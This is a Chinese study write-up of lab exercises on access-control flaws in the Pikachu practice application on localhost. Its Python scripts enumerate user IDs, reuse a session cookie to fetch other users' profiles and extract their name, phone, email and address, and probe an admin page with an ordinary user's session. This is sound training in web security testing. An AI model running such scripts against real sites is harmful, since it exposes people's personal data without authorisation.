## 一、核心目标
1.  实现批量用户ID测试水平越权的基础逻辑
2.  编写带越权判断逻辑的请求脚本，验证漏洞存在
3.  使用requests库探测垂直越权，扫描管理员后台路径

---

## 二、代码实现与逐行解析

### 习题1：批量用户ID测试水平越权
```python
# 模拟多个目标用户ID，批量测试水平越权
user_ids = [1, 2, 3, 5, 8]
url_template = "http://localhost/pikachu/vul/overpermission/op1/op1.php?userid={}"

for uid in user_ids:
    url = url_template.format(uid)
    print(f"测试: {url}")

### 习题2：带越权判断逻辑的请求脚本
import requests

url = "http://127.0.0.1:9999/pikachu/vul/overpermission/op1/op1_mem.php"
headers = {"Cookie": "PHPSESSID=5u9q4ol8fhpupdkt7i9l82ob43"}  # 当前登录用户 kobe 的 Cookie

current_user = "kobe"
usernames = ["vince", "lucy", "lili", "allen", "kevin"]

for username in usernames:
    params = {"username": username, "submit": "点击查看个人信息"}
    resp = requests.get(url, headers=headers, params=params)
    print(f"\n测试用户: {username} | 状态码: {resp.status_code}")
    
    if username != current_user and "个人信息中心" in resp.text:
        print(f"水平越权漏洞存在！可访问 {username} 的资料")
        print("--- 资料片段 ---")
        for line in resp.text.split('\n'):
            if any(k in line for k in ["姓名", "手机", "邮箱", "住址"]):
                print(line.strip())
        print("-"*30)
    else:
        print(f"无法访问 {username} 的资料（权限正常）")

### 习题3：垂直越权探测（普通用户访管理员页面
import requests
admin_urls=[
    "http://127.0.0.1:9999/pikachu/vul/overpermission/op2/op2_admin.php"
]
headers={
    "cookie":"PHPSESSID=km9oveafhn7qa2cn79g1tiv4r3;security=low"
}
for url in admin_urls:
    resp=requests.get(url,headers=headers)
    if resp.status_code == 200 and "删除" in resp.text:
        print(f"垂直越权成功:{url}")
    else:
        print(f"无法访问:{url}")
### （今天代码中学会了哪里修改参数去对比问题，比如删除这里是管理者后台有的特殊字符串，包括params参数要对应准确）
